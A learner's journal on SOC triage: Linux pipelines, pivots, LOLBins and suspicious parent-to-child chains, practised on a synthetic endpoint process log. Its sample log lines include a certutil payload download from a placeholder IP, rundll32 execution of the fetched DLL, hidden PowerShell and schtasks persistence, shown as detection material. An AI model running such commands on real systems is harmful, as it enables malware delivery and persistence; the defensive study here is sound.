🎯 Goal

Build a stronger SOC analyst mental model using Linux command-line workflows by learning how to turn raw output into evidence through:

  • pivots (investigation anchors)
  • filtering, extraction, and grouping
  • parent → child process relationships
  • process-name vocabulary (especially common Windows admin tools and LOLBins)

I also practiced this thinking using a fake endpoint process log lab with awk, sort, and uniq.


πŸ› οΈ What I Did

Reinforced the core SOC idea: raw events are material, not the answer

A key idea that became clearer today:

Raw events are narrative fragments.
Counting and grouping transforms them into evidence.

To analyze data effectively, I focused on three questions:

  • What part matters?
    Which field answers the question?

  • How do I isolate it?
    Filter noise and extract relevant fields.

  • How do I detect patterns?
    Count, group, and compare behavior.

This thinking directly connects Linux pipelines with SOC triage workflows.
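The three questions can be walked through on a tiny invented example (the log lines and field layout here are made up for illustration):

```shell
# Synthetic auth events: timestamp user result (invented for illustration)
printf '%s\n' \
  '09:01 alice success' \
  '09:02 bob failure' \
  '09:03 bob failure' \
  '09:04 alice success' > auth.log

# What part matters?        The user and result fields ($2 and $3).
# How do I isolate it?      awk extracts just those fields.
# How do I detect patterns? sort | uniq -c counts repeated combinations.
awk '{print $2, $3}' auth.log | sort | uniq -c | sort -nr
```

Four raw lines become two counted behaviors: repeated successes for one user, repeated failures for another.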


Learned what a “pivot” means in investigations

A pivot is a field value an analyst reuses to move an investigation forward across related events.

Common pivots include:

  • IP address
  • username
  • hostname
  • process name
  • parent process
  • command line
  • domain
  • file hash
  • URL path
  • event result or status code

Two clarifications that helped:

  • hash → fingerprint of a file’s contents (used to identify known malware or known-good files)
  • status/result → outcome field such as success, failure, HTTP status codes, etc.

Without pivots, logs are just text.
With pivots, they become investigation paths.
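A small sketch of pivoting, using an invented pipe-delimited log (fields and values are assumptions for the example): grep follows one username through the events, then awk extracts the hosts that account touched.

```shell
# Synthetic events: timestamp|host|user|process (invented for illustration)
printf '%s\n' \
  '10:00|web01|svc_backup|powershell.exe' \
  '10:01|web02|alice|chrome.exe' \
  '10:02|db01|svc_backup|certutil.exe' > events.log

# Pivot on the user "svc_backup": every event it appears in
grep 'svc_backup' events.log

# Follow the pivot across hosts: which machines did this account touch?
grep 'svc_backup' events.log | awk -F'|' '{print $2}'
```

The same pattern works with any pivot from the list above: swap the grep term for an IP, a hash, or a domain.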


Studied process names and their investigative value

Process names are clues, not conclusions.

Examples studied:

ssh
bash
powershell.exe
cmd.exe
curl
python
rundll32.exe
mshta.exe
wmic.exe
certutil.exe
wget
nc

Many attackers abuse legitimate tools known as:

LOLBins (Living Off the Land Binaries)
Legitimate system utilities used for malicious actions.

Seeing powershell.exe alone means nothing.

Context matters:

  • parent process
  • command line
  • user
  • host
  • timestamp
  • follow-on activity

Built a working vocabulary strategy

Instead of memorizing thousands of process names, I started grouping them by function.

Example categories:

  • admin tools
  • scripting engines and runtimes
  • browsers and Office apps (important parent processes)
  • LOLBins
  • security tools

This reduces cognitive load and improves pattern recognition.


Learned why parent → child relationships matter

Parent-child process relationships are one of the fastest ways to spot suspicious behavior.

Example comparison:

powershell.exe

might be normal.

But:

winword.exe → powershell.exe

is far more suspicious.

Examples of suspicious combinations studied:

winword.exe → powershell.exe
excel.exe → cmd.exe
outlook.exe → mshta.exe
chrome.exe → powershell.exe
msedge.exe → mshta.exe
w3wp.exe → cmd.exe
mshta.exe → powershell.exe

Follow-up investigation should check:

  • command line arguments
  • user context
  • host type
  • process path
  • execution time
  • subsequent processes
  • network activity
  • baseline frequency
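Chains like these can also be flagged mechanically. A sketch with awk over a small invented dataset (file name, events, and the exact parent/child lists are assumptions for the example):

```shell
# Synthetic events: timestamp|host|user|parent|child|cmdline (invented)
cat > chains.log <<'EOF'
09:10|ws01|alice|explorer.exe|winword.exe|winword.exe invoice.docm
09:11|ws01|alice|winword.exe|powershell.exe|powershell.exe -nop -w hidden
09:12|ws02|bob|explorer.exe|chrome.exe|chrome.exe
EOF

# Flag Office parents spawning script interpreters (a classic suspicious chain)
awk -F'|' '$4 ~ /^(winword|excel|outlook)\.exe$/ &&
           $5 ~ /^(powershell|cmd|mshta)\.exe$/ {print $1, $2, $3, $4 " -> " $5}' chains.log
```

Only the winword.exe → powershell.exe event surfaces; the benign explorer.exe chains are filtered out.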

Built a fake endpoint process log lab

To practice analysis, I created a synthetic log file called:

proc_events.log

The file contained pipe-delimited fields:

  1. timestamp
  2. host
  3. user
  4. parent process
  5. child process
  6. command line

Correct parsing required:

awk -F'|'

Important lesson:

Do not assume spaces are delimiters, especially when command lines contain spaces.
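A quick demonstration of why the delimiter matters, on one invented event line:

```shell
# One synthetic event; the command line (field 6) contains spaces
echo 'T09:00|ws01|alice|winword.exe|powershell.exe|powershell.exe -nop -c whoami' > demo.log

# Wrong: default whitespace splitting breaks on the spaces in the command line,
# so $5 is not the child process (here it is empty)
awk '{print $5}' demo.log

# Right: split on the pipe, so $5 is the child process field
awk -F'|' '{print $5}' demo.log
```

With whitespace splitting, everything up to the first space collapses into $1 and the analyst ends up counting command-line fragments instead of processes.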


Practiced SOC-style analysis pipelines

Using Linux pipelines, I answered investigative questions such as:

  • Which parent → child combinations appear most often?
  • Which processes appear rarely?
  • Which hosts execute suspicious commands?
  • Which users trigger unusual activity?

Example pipeline pattern:

awk -F'|' '{print $4 " -> " $5}' proc_events.log | sort | uniq -c | sort -nr

Other exercises included:

  • filtering suspicious process names
  • grouping by host
  • grouping by user
  • identifying URLs inside command lines
  • finding rare processes
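Two of those exercises sketched on a small invented dataset in the lab's six-field layout (hosts, users, commands, and the "suspicious" name list are all made up):

```shell
# Synthetic events: timestamp|host|user|parent|child|cmdline (invented)
cat > proc_events.log <<'EOF'
09:00|ws01|alice|explorer.exe|chrome.exe|chrome.exe
09:01|ws01|alice|explorer.exe|chrome.exe|chrome.exe
09:02|ws02|bob|explorer.exe|chrome.exe|chrome.exe
09:03|ws02|bob|winword.exe|powershell.exe|powershell.exe -nop
09:04|ws03|carol|cmd.exe|certutil.exe|certutil.exe -urlcache -f http://203.0.113.5/a.dll a.dll
EOF

# Finding rare processes: lowest counts first (rarity is often where the signal is)
awk -F'|' '{print $5}' proc_events.log | sort | uniq -c | sort -n

# Grouping suspicious child processes by host
awk -F'|' '$5 ~ /powershell|certutil|mshta/ {print $2}' proc_events.log | sort | uniq -c
```

The common chrome.exe launches sink to the bottom, while the one-off certutil.exe and powershell.exe events rise to the top of the rarity list.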

Reconstructed attack narratives

By examining suspicious chains in the synthetic dataset, I could reconstruct realistic attack sequences.

Example attack story:

  1. Office application launches PowerShell
  2. reconnaissance commands run (whoami, ipconfig)
  3. payload download using certutil
  4. DLL execution via rundll32
  5. persistence established with:
    • reg.exe
    • schtasks.exe

This made the phrase “raw events are narrative fragments” feel very real.
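A story like that can be recovered from flat events by pivoting on the host and ordering by time. A sketch over invented, deliberately shuffled events:

```shell
# Synthetic, out-of-order events: timestamp|host|user|parent|child|cmdline (invented)
cat > story.log <<'EOF'
09:03|ws01|alice|powershell.exe|certutil.exe|certutil.exe -urlcache -f http://203.0.113.5/p.dll p.dll
09:01|ws01|alice|explorer.exe|winword.exe|winword.exe invoice.docm
09:04|ws01|alice|powershell.exe|rundll32.exe|rundll32.exe p.dll,Start
09:02|ws01|alice|winword.exe|powershell.exe|powershell.exe -nop -w hidden
09:05|ws01|alice|powershell.exe|schtasks.exe|schtasks.exe /create /tn upd /tr p.dll
EOF

# Pivot on the host, sort by timestamp, and read the chain in order
grep '|ws01|' story.log | sort -t'|' -k1,1 | awk -F'|' '{print $1, $4, "->", $5}'
```

Sorted, the fragments read as a narrative: Office spawns PowerShell, which downloads, executes, and persists.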


πŸ” Key Cybersecurity Connections

Linux pipelines mirror SIEM queries

Linux command-line workflows use the same logic as SIEM queries:

filter → extract → group → rank → interpret

Practicing pipelines builds the same reasoning required for SOC analysis.
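Each stage maps onto a standard tool. A sketch over invented events (the stage-to-command mapping, not the data, is the point):

```shell
# filter -> grep   extract -> awk   group -> sort + uniq -c   rank -> sort -nr
printf '%s\n' \
  '09:00|ws01|alice|winword.exe|powershell.exe' \
  '09:01|ws01|alice|winword.exe|powershell.exe' \
  '09:02|ws02|bob|explorer.exe|chrome.exe' > stage_demo.log

grep 'powershell' stage_demo.log \
  | awk -F'|' '{print $4 " -> " $5}' \
  | sort | uniq -c | sort -nr
# interpret: repeated winword.exe -> powershell.exe launches warrant a closer look
```

A SIEM query engine runs the same conceptual stages; only the syntax differs.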


Process triage depends on context

Suspicious tools alone are not enough to confirm malicious behavior.

Signal comes from:

  • parent → child relationship
  • command-line arguments
  • user role
  • host type
  • baseline frequency
  • follow-on activity

Pivots drive investigations

Pivots allow analysts to follow activity across logs:

  • IP
  • host
  • user
  • process
  • domain
  • hash
  • result

Without pivots, analysts only read logs.
With pivots, they investigate behavior.


⚠️ Challenges

Process vocabulary is still developing

Many Windows process names are still unfamiliar, which slows interpretation.

Avoiding name-based conclusions

It is easy to treat scary-looking process names as proof of compromise.

Reminder:

name = clue
context = verdict

Parsing discipline

Incorrect assumptions about log structure can produce incorrect results.

Always inspect:

  • delimiter
  • field positions
  • log format

before parsing.


🧠 What I Learned

Technical

  • how SOC pivots work
  • why parent process and command line matter more than names
  • how common Windows utilities are abused
  • how to parse pipe-delimited logs with awk
  • how to construct analysis pipelines

Analytical mindset

  • raw events are not evidence
  • grouping reveals patterns
  • rare events often contain valuable signals
  • process chains reveal activity narratives

⏭️ Next Steps

  1. Repeat the fake process log lab without notes
  2. Run a challenge round on the same dataset
  3. Expand process-name vocabulary (5 processes per day)
  4. Practice additional log formats:
    • authentication logs
    • web access logs
    • JSON logs (jq)
  5. Begin mapping suspicious process chains to detection rules

💭 Reflection

Today felt like a major SOC foundations day.

The key realization was that Linux command-line skills are not just terminal tricks; they are a method for transforming raw event data into evidence.

Grouping process names into functional categories also made endpoint telemetry easier to interpret.

This type of groundwork directly supports future work in:

  • detection engineering
  • SOC triage
  • incident response
  • SIEM query building

🧩 Lessons Learned

What worked

  • grouping processes by function instead of memorizing names
  • using parent → child relationships for fast context
  • practicing on synthetic logs
  • repeating the filter → isolate → group workflow

What broke

  • unfamiliarity with many Windows process names
  • risk of treating process names as conclusions

Why it broke

  • early stage of building SOC vocabulary
  • endpoint telemetry requires context-rich thinking

Fix / takeaway

  • build a working vocabulary of common processes
  • always inspect log format before parsing
  • treat process names as starting points, not conclusions